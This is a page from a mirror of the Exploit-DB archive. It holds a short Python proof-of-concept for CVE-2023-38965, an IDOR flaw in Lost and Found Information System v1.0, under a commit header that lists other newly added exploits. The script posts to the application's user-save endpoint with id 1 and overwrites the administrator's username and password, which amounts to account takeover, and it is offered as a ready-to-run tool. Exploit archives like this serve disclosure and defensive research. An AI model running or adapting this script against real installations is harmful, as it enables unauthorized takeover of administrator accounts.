exploit-db-mirror/exploits/php/webapps/51795.py
Exploit-DB 5c0c152cec DB: 2024-02-14
6 changes to exploits/shellcodes/ghdb

VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) - Remote Denial Of Service

Splunk 9.0.4 - Information Disclosure

Lost and Found Information System v1.0 - ( IDOR ) leads to Account Take over

ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure
2024-02-14 00:16:18 +00:00

37 lines
No EOL
964 B
Python
Executable file

# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965
Python p0c :
import argparse
import requests
import time
parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()
url = args.url + '/classes/Users.php?f=save'
data = {
'id': '1',
'firstname': 'or4ng',
'middlename': '',
'lastname': 'Admin',
'username': args.user,
'password': args.password
}
response = requests.post(url, data)
if b"1" in response.content:
print("Exploit ..")
time.sleep(1)
print("User :" + args.user + "\nPassword :" + args.password)
else:
print("Exploit Failed..")